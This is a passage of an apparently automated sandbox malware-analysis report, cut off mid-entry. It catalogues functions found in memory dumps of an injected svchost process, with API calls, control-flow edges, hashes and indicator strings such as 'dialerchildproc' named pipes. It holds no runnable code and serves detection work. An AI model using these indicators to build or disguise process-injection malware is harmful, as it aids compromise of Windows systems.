                        • FlsSetValue.KERNEL32(?,?,?,00000158709E0A6B,?,?,?,00000158709E045C,?,?,?,00000158709DC84F), ref: 00000158709DCE9A
                        • FlsSetValue.KERNEL32(?,?,?,00000158709E0A6B,?,?,?,00000158709E045C,?,?,?,00000158709DC84F), ref: 00000158709DCEAB
                        • FlsSetValue.KERNEL32(?,?,?,00000158709E0A6B,?,?,?,00000158709E045C,?,?,?,00000158709DC84F), ref: 00000158709DCEBC
                        • SetLastError.KERNEL32 ref: 00000158709DCED7
                        • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,00000158709E0A6B,?,?,?,00000158709E045C,?,?,?,00000158709DC84F), ref: 00000158709DCF0D
                        • FlsSetValue.KERNEL32(?,?,00000001,00000158709DECCC,?,?,?,?,00000158709DBF9F,?,?,?,?,?,00000158709D7AB0), ref: 00000158709DCF2C
                          • Part of subcall function 00000158709DD6CC: HeapAlloc.KERNEL32 ref: 00000158709DD721
                        • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000158709E0A6B,?,?,?,00000158709E045C,?,?,?,00000158709DC84F), ref: 00000158709DCF54
                          • Part of subcall function 00000158709DD744: HeapFree.KERNEL32 ref: 00000158709DD75A
                          • Part of subcall function 00000158709DD744: GetLastError.KERNEL32 ref: 00000158709DD764
                        • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000158709E0A6B,?,?,?,00000158709E045C,?,?,?,00000158709DC84F), ref: 00000158709DCF65
                        • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000158709E0A6B,?,?,?,00000158709E045C,?,?,?,00000158709DC84F), ref: 00000158709DCF76
                        Memory Dump Source
                        • Source File: 0000004A.00000002.2726508811.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_74_2_158709d0000_svchost.jbxd
                        Similarity
                        • API ID: Value$ErrorLast$Heap$AllocFree
                        • String ID:
                        • API String ID: 570795689-0
                        • Opcode ID: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                        • Instruction ID: 9975690624174f1e8eecd39a416a149b1b9c960f19d828ddab801993930161a0
                        • Opcode Fuzzy Hash: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                        • Instruction Fuzzy Hash: DB4184BC289E4DC1FA6867255D523E932425BCC7B6F740724A8367E7DBED28D8434E80
                        Function 00000158709D2244 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52filethreadCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000004A.00000002.2726508811.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_74_2_158709d0000_svchost.jbxd
                        Similarity
                        • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                        • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                        • API String ID: 2171963597-1373409510
                        • Opcode ID: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                        • Instruction ID: 9d08b4948e7ab7a7583e3835b8c16d8cf2b2d0085f3f9790f0536a71d5975b49
                        • Opcode Fuzzy Hash: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                        • Instruction Fuzzy Hash: 0D21303A618A54C2E710CB25F84439977A0F7C9BE6F640215DA591ABA8CF3CC55ACF00
                        Function 00000158709A9944 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 483 158709a9944-158709a99ac call 158709aa814 486 158709a99b2-158709a99b5 483->486 487 158709a9e13-158709a9e1b call 158709abb48 483->487 486->487 488 158709a99bb-158709a99c1 486->488 490 158709a9a90-158709a9aa2 488->490 491 158709a99c7-158709a99cb 488->491 493 158709a9d63-158709a9d67 490->493 494 158709a9aa8-158709a9aac 490->494 491->490 495 158709a99d1-158709a99dc 491->495 496 158709a9da0-158709a9daa call 158709a8a34 493->496 497 158709a9d69-158709a9d70 493->497 494->493 498 158709a9ab2-158709a9abd 494->498 495->490 499 158709a99e2-158709a99e7 495->499 496->487 511 158709a9dac-158709a9dcb call 158709a6d40 496->511 497->487 500 158709a9d76-158709a9d9b call 158709a9e1c 497->500 498->493 502 158709a9ac3-158709a9aca 498->502 499->490 503 158709a99ed-158709a99f7 call 158709a8a34 499->503 500->496 507 158709a9ad0-158709a9b07 call 158709a8e10 502->507 508 158709a9c94-158709a9ca0 502->508 503->511 514 158709a99fd-158709a9a28 call 158709a8a34 * 2 call 158709a9124 503->514 507->508 519 158709a9b0d-158709a9b15 507->519 508->496 512 158709a9ca6-158709a9caa 508->512 516 158709a9cba-158709a9cc2 512->516 517 158709a9cac-158709a9cb8 call 158709a90e4 512->517 551 158709a9a2a-158709a9a2e 514->551 552 158709a9a48-158709a9a52 call 158709a8a34 514->552 516->496 518 158709a9cc8-158709a9cd5 call 158709a8cb4 516->518 517->516 527 158709a9cdb-158709a9ce3 517->527 518->496 518->527 524 158709a9b19-158709a9b4b 519->524 529 158709a9b51-158709a9b5c 524->529 530 158709a9c87-158709a9c8e 524->530 532 158709a9df6-158709a9e12 call 158709a8a34 * 2 call 158709abaa8 527->532 533 158709a9ce9-158709a9ced 527->533 529->530 534 158709a9b62-158709a9b7b 529->534 530->508 530->524 532->487 536 158709a9d00 533->536 537 158709a9cef-158709a9cfe call 158709a90e4 533->537 538 158709a9b81-158709a9bc6 call 158709a90f8 * 2 534->538 539 158709a9c74-158709a9c79 534->539 547 158709a9d03-158709a9d0d call 158709aa8ac 536->547 537->547 564 158709a9c04-158709a9c0a 538->564 565 158709a9bc8-158709a9bee call 158709a90f8 call 158709aa038 538->565 544 158709a9c84 539->544 544->530 547->496 562 158709a9d13-158709a9d61 call 158709a8d44 call 158709a8f50 547->562 551->552 556 158709a9a30-158709a9a3b 551->556 552->490 568 158709a9a54-158709a9a74 call 158709a8a34 * 2 call 158709aa8ac 552->568 556->552 561 158709a9a3d-158709a9a42 556->561 561->487 561->552 562->496 570 158709a9c7b 564->570 571 158709a9c0c-158709a9c10 564->571 583 158709a9bf0-158709a9c02 565->583 584 158709a9c15-158709a9c72 call 158709a9870 565->584 589 158709a9a76-158709a9a80 call 158709aa99c 568->589 590 158709a9a8b 568->590 576 158709a9c80 570->576 571->538 576->544 583->564 583->565 584->576 593 158709a9df0-158709a9df5 call 158709abaa8 589->593 594 158709a9a86-158709a9def call 158709a86ac call 158709aa3f4 call 158709a88a0 589->594 590->490 593->532 594->593
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000004A.00000002.2726474663.00000158709A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709A0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_74_2_158709a0000_svchost.jbxd
                        Similarity
                        • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                        • String ID: csm$csm$csm
                        • API String ID: 849930591-393685449
                        • Opcode ID: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                        • Instruction ID: 08ab0671c9424b5081223383289d6080edcd3caa4dd75a7e0d5916fa68029c91
                        • Opcode Fuzzy Hash: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                        • Instruction Fuzzy Hash: 8AE16EBA608F40CAEB60DB69DC403DD77A4F799799F204116EE896BB95CF34C492DB00
                        Function 00000158709DA544 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 604 158709da544-158709da5ac call 158709db414 607 158709daa13-158709daa1b call 158709dc748 604->607 608 158709da5b2-158709da5b5 604->608 608->607 609 158709da5bb-158709da5c1 608->609 611 158709da5c7-158709da5cb 609->611 612 158709da690-158709da6a2 609->612 611->612 616 158709da5d1-158709da5dc 611->616 614 158709da963-158709da967 612->614 615 158709da6a8-158709da6ac 612->615 617 158709da9a0-158709da9aa call 158709d9634 614->617 618 158709da969-158709da970 614->618 615->614 619 158709da6b2-158709da6bd 615->619 616->612 620 158709da5e2-158709da5e7 616->620 617->607 630 158709da9ac-158709da9cb call 158709d7940 617->630 618->607 621 158709da976-158709da99b call 158709daa1c 618->621 619->614 623 158709da6c3-158709da6ca 619->623 620->612 624 158709da5ed-158709da5f7 call 158709d9634 620->624 621->617 627 158709da894-158709da8a0 623->627 628 158709da6d0-158709da707 call 158709d9a10 623->628 624->630 634 158709da5fd-158709da628 call 158709d9634 * 2 call 158709d9d24 624->634 627->617 631 158709da8a6-158709da8aa 627->631 628->627 639 158709da70d-158709da715 628->639 636 158709da8ac-158709da8b8 call 158709d9ce4 631->636 637 158709da8ba-158709da8c2 631->637 672 158709da648-158709da652 call 158709d9634 634->672 673 158709da62a-158709da62e 634->673 636->637 652 158709da8db-158709da8e3 636->652 637->617 643 158709da8c8-158709da8d5 call 158709d98b4 637->643 645 158709da719-158709da74b 639->645 643->617 643->652 649 158709da887-158709da88e 645->649 650 158709da751-158709da75c 645->650 649->627 649->645 650->649 653 158709da762-158709da77b 650->653 654 158709da9f6-158709daa12 call 158709d9634 * 2 call 158709dc6a8 652->654 655 158709da8e9-158709da8ed 652->655 657 158709da874-158709da879 653->657 658 158709da781-158709da7c6 call 158709d9cf8 * 2 653->658 654->607 659 158709da900 655->659 660 158709da8ef-158709da8fe call 158709d9ce4 655->660 663 158709da884 657->663 685 158709da804-158709da80a 658->685 686 158709da7c8-158709da7ee call 158709d9cf8 call 158709dac38 658->686 668 158709da903-158709da90d call 158709db4ac 659->668 660->668 663->649 668->617 683 158709da913-158709da961 call 158709d9944 call 158709d9b50 668->683 672->612 689 158709da654-158709da674 call 158709d9634 * 2 call 158709db4ac 672->689 673->672 677 158709da630-158709da63b 673->677 677->672 682 158709da63d-158709da642 677->682 682->607 682->672 683->617 690 158709da80c-158709da810 685->690 691 158709da87b 685->691 705 158709da815-158709da872 call 158709da470 686->705 706 158709da7f0-158709da802 686->706 710 158709da676-158709da680 call 158709db59c 689->710 711 158709da68b 689->711 690->658 695 158709da880 691->695 695->663 705->695 706->685 706->686 714 158709da686-158709da9ef call 158709d92ac call 158709daff4 call 158709d94a0 710->714 715 158709da9f0-158709da9f5 call 158709dc6a8 710->715 711->612 714->715 715->654
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000004A.00000002.2726508811.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_74_2_158709d0000_svchost.jbxd
                        Similarity
                        • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                        • String ID: csm$csm$csm
                        • API String ID: 849930591-393685449
                        • Opcode ID: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                        • Instruction ID: f3fa1228f9b23b1bab88f1be00c529a69e786049c2ce1459848cac513dec6a52
                        • Opcode Fuzzy Hash: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                        • Instruction Fuzzy Hash: D0E1807A648F48CAEB20DF65D8803DD77A0F799799F640115EE896BB96CF34C492CB00
                        Function 00000158709DF394 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000004A.00000002.2726508811.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_74_2_158709d0000_svchost.jbxd
                        Similarity
                        • API ID: AddressFreeLibraryProc
                        • String ID: api-ms-$ext-ms-
                        • API String ID: 3013587201-537541572
                        • Opcode ID: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                        • Instruction ID: cb0434ac2a4b0d4f8a64736bfb55d34b7dfcd7b844d76ba5a6e5c12046194fd4
                        • Opcode Fuzzy Hash: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                        • Instruction Fuzzy Hash: 9441293A359E04D1EA15CB16AC147D63391B7CDBE2F2541299D0DAF7AAEE38C4478B40
                        Function 00000158709DD068 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 54COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • FlsGetValue.KERNEL32(?,?,?,00000158709DC7DE,?,?,?,?,?,?,?,?,00000158709DCF9D,?,?,00000001), ref: 00000158709DD087
                        • FlsSetValue.KERNEL32(?,?,?,00000158709DC7DE,?,?,?,?,?,?,?,?,00000158709DCF9D,?,?,00000001), ref: 00000158709DD0A6
                        • FlsSetValue.KERNEL32(?,?,?,00000158709DC7DE,?,?,?,?,?,?,?,?,00000158709DCF9D,?,?,00000001), ref: 00000158709DD0CE
                        • FlsSetValue.KERNEL32(?,?,?,00000158709DC7DE,?,?,?,?,?,?,?,?,00000158709DCF9D,?,?,00000001), ref: 00000158709DD0DF
                        • FlsSetValue.KERNEL32(?,?,?,00000158709DC7DE,?,?,?,?,?,?,?,?,00000158709DCF9D,?,?,00000001), ref: 00000158709DD0F0
                        Strings
                        Memory Dump Source
                        • Source File: 0000004A.00000002.2726508811.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_74_2_158709d0000_svchost.jbxd
                        Similarity
                        • API ID: Value
                        • String ID: 1%$Y%
                        • API String ID: 3702945584-1395475152
                        • Opcode ID: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                        • Instruction ID: 1d2e9aa775ac6edd092d1a246d88b9f5446202352410f6619a6c14a773fb799f
                        • Opcode Fuzzy Hash: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                        • Instruction Fuzzy Hash: 9811307878DE4CC1FA6857259D523F971419BCC7A6F78422594292E7DBDE28D4438A00
                        Function 00000158709D7510 Relevance: 12.2, APIs: 8, Instructions: 230COMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 0000004A.00000002.2726508811.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_74_2_158709d0000_svchost.jbxd
                        Similarity
                        • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                        • String ID:
                        • API String ID: 190073905-0
                        • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                        • Instruction ID: 3d8f95e5633d4c6b653d59d18f429cffb185ad790c80063b25e37e7c71a7f415
                        • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                        • Instruction Fuzzy Hash: 03817E3D688E49C6FA50EB65AC413D9B291ABCD782F744415A9086F7A7FF38C8478F01
                        Function 00000158709D9DC4 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000004A.00000002.2726508811.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_74_2_158709d0000_svchost.jbxd
                        Similarity
                        • API ID: Library$Load$AddressErrorFreeLastProc
                        • String ID: api-ms-
                        • API String ID: 2559590344-2084034818
                        • Opcode ID: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                        • Instruction ID: 7fb3335a45b0d0e99637cb6ac1d0fd9b443a23753f7729f4e4207a61b16c956a
                        • Opcode Fuzzy Hash: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                        • Instruction Fuzzy Hash: 2031D83A35AE44E1EE11EB42AC007D97394B7CCBA2F7906259D1E6F392DF38C4568B10
                        Function 00000158709E3DB4 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000004A.00000002.2726508811.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_74_2_158709d0000_svchost.jbxd
                        Similarity
                        • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                        • String ID: CONOUT$
                        • API String ID: 3230265001-3130406586
                        • Opcode ID: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                        • Instruction ID: 5854a10f70b8acde66e217e2d3e673b9bf3bb195df514e6a525a3e7a0ccb6496
                        • Opcode Fuzzy Hash: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                        • Instruction Fuzzy Hash: 52118236314F40C6E7508B52FC5435976A0F7CCFE6F244218EA5A9B7A4CF78C9668B80
                        Function 00000158709D3790 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 44COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000004A.00000002.2726508811.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_74_2_158709d0000_svchost.jbxd
                        Similarity
                        • API ID: CurrentProcessProtectVirtual$HandleModule
                        • String ID: wr
                        • API String ID: 1092925422-2678910430
                        • Opcode ID: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                        • Instruction ID: c1706b2b0473ed2e9d02f1dddf1a74ec365221044fa21d2a3e131ac40444c417
                        • Opcode Fuzzy Hash: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                        • Instruction Fuzzy Hash: 60113C3A708F45C2EF549B22E8043A972A1F788B97F644029DE895B765EF3DC916CB04
                        Function 00000158709D5B30 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 0000004A.00000002.2726508811.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_74_2_158709d0000_svchost.jbxd
                        Similarity
                        • API ID: Thread$Current$Context
                        • String ID:
                        • API String ID: 1666949209-0
                        • Opcode ID: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                        • Instruction ID: 60ab21630707aac3798ecf9166792788bd74f2907c85a2321cc20bfd57c17da0
                        • Opcode Fuzzy Hash: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                        • Instruction Fuzzy Hash: CFD17B7A259F48D1DA70DB16E89439A77A0F3CCB85F200116EA8D5BBA5DF38C552CF40
                        Function 00000158709D2F04 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 93memoryCOMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000004A.00000002.2726508811.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_74_2_158709d0000_svchost.jbxd
                        Similarity
                        • API ID: Heap$Process$AllocFree
                        • String ID: dialer
                        • API String ID: 756756679-3528709123
                        • Opcode ID: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                        • Instruction ID: e6d8faa326a562ef7d00f18873055ee8b9534239608773783dd45c2c1394fe41
                        • Opcode Fuzzy Hash: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                        • Instruction Fuzzy Hash: FE31923A709F59C2E615CF16ED407E977A0FB98B82F1884249E485BB56EF34C462CB00
                        Function 00000158709DCFA0 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 0000004A.00000002.2726508811.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_74_2_158709d0000_svchost.jbxd
                        Similarity
                        • API ID: Value$ErrorLast
                        • String ID:
                        • API String ID: 2506987500-0
                        • Opcode ID: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                        • Instruction ID: aa873455afc96999b87c21931bd58146887484eb7e08ab61906587a09483081b
                        • Opcode Fuzzy Hash: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                        • Instruction Fuzzy Hash: EA116379389E48C1FA6457259E553E931425BCC7F6F344714A8366F7DBDD28C4438E40
                        Function 00000158709D199C Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 0000004A.00000002.2726508811.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_74_2_158709d0000_svchost.jbxd
                        Similarity
                        • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                        • String ID:
                        • API String ID: 517849248-0
                        • Opcode ID: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                        • Instruction ID: 7cc37782291b92a2b75e31e5930a5bab2ef7aa798e5d7ec79eb9ff034366abf0
                        • Opcode Fuzzy Hash: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                        • Instruction Fuzzy Hash: 2F016D36304E44C2EB54DB62A84839973A1F78CBC2FA84035DE4967765DF3CC99ACB00
                        Function 00000158709D36C8 Relevance: 9.0, APIs: 6, Instructions: 38threadCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 0000004A.00000002.2726508811.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_74_2_158709d0000_svchost.jbxd
                        Similarity
                        • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                        • String ID:
                        • API String ID: 449555515-0
                        • Opcode ID: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                        • Instruction ID: d92c0bde52101c03c87867e95d8acc90603132017f221265b0eb273a598ab5d0
                        • Opcode Fuzzy Hash: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                        • Instruction Fuzzy Hash: 3B011B7A215F44C2FB249B22EC0839973A0BB9DB87F244428CD492B765EF3DC51A8B00
                        Function 00000158709D9005 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 135COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000004A.00000002.2726508811.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_74_2_158709d0000_svchost.jbxd
                        Similarity
                        • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                        • String ID: csm$f
                        • API String ID: 2395640692-629598281
                        • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                        • Instruction ID: 04aa9ae47b2a9c131ca64884b0331827bb0d1dcec54a8120c3393878895a1e76
                        • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                        • Instruction Fuzzy Hash: CE51C63A74DA06CADB14EF15EC48B993795F389B9AF218124DA076B74ADF75CC42CB00
                        Function 00000158709D8FE8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 75COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000004A.00000002.2726508811.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_74_2_158709d0000_svchost.jbxd
                        Similarity
                        • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                        • String ID: csm$f
                        • API String ID: 2395640692-629598281
                        • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                        • Instruction ID: cc6c5033e38e6afa751b52c8de9f6da4c93002e611e71df0da7fecd0cba56087
                        • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                        • Instruction Fuzzy Hash: 0F31C43A348A44D6E714EF11EC447993765F388BCAF258114EE4A2B746DF39C942CF04
                        Function 00000158709D1A40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000004A.00000002.2726508811.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_74_2_158709d0000_svchost.jbxd
                        Similarity
                        • API ID: FinalHandleNamePathlstrlen
                        • String ID: \\?\
                        • API String ID: 2719912262-4282027825
                        • Opcode ID: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                        • Instruction ID: 698509cad8b23d240c0b825ecc2b97b4a5749d1b6b2534689e1e69f203ffbdc3
                        • Opcode Fuzzy Hash: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                        • Instruction Fuzzy Hash: 77F03C37704A45D2EB608B61FC847997760F78CBDAFA44020DA495AA65DE2CCA9ECF00
                        Function 00000158709D3044 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000004A.00000002.2726508811.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_74_2_158709d0000_svchost.jbxd
                        Similarity
                        • API ID: CombinePath
                        • String ID: \\.\pipe\
                        • API String ID: 3422762182-91387939
                        • Opcode ID: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                        • Instruction ID: de2cf2f2a9d9284385138a2729b234b0e2eb91eb51179958fd2d97b66a3f2f3e
                        • Opcode Fuzzy Hash: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                        • Instruction Fuzzy Hash: 8EF05439204F84C1EA104B12BD042997260A78CFD2F289120DD461BB29DE28C8568B00
                        Function 00000158709DBC98 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000004A.00000002.2726508811.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_74_2_158709d0000_svchost.jbxd
                        Similarity
                        • API ID: AddressFreeHandleLibraryModuleProc
                        • String ID: CorExitProcess$mscoree.dll
                        • API String ID: 4061214504-1276376045
                        • Opcode ID: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                        • Instruction ID: 10d4d02c46d8948fd3dba8b0568bcad9390f76deb3f3d4399e5b44582f6e7a45
                        • Opcode Fuzzy Hash: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                        • Instruction Fuzzy Hash: C0F0627A215E04D1EB148B29EC443997320FBCDBA7F640219CA6A5D2F4CF2CC956CB00
                        Function 00000158709D50D0 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 0000004A.00000002.2726508811.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_74_2_158709d0000_svchost.jbxd
                        Similarity
                        • API ID: CurrentThread
                        • String ID:
                        • API String ID: 2882836952-0
                        • Opcode ID: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
                        • Instruction ID: d8e4fcef7782aab0e6196fa45eef77e5817cd3fcfaeadc4be3155837d2d64916
                        • Opcode Fuzzy Hash: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
                        • Instruction Fuzzy Hash: EF02A83625DB84C6E760CB55E89039AB7A1F3C8795F204015EA8E9BBA9DF7CC495CF00
                        Function 00000158709D5710 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 0000004A.00000002.2726508811.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                        Joe Sandbox IDA Plugin
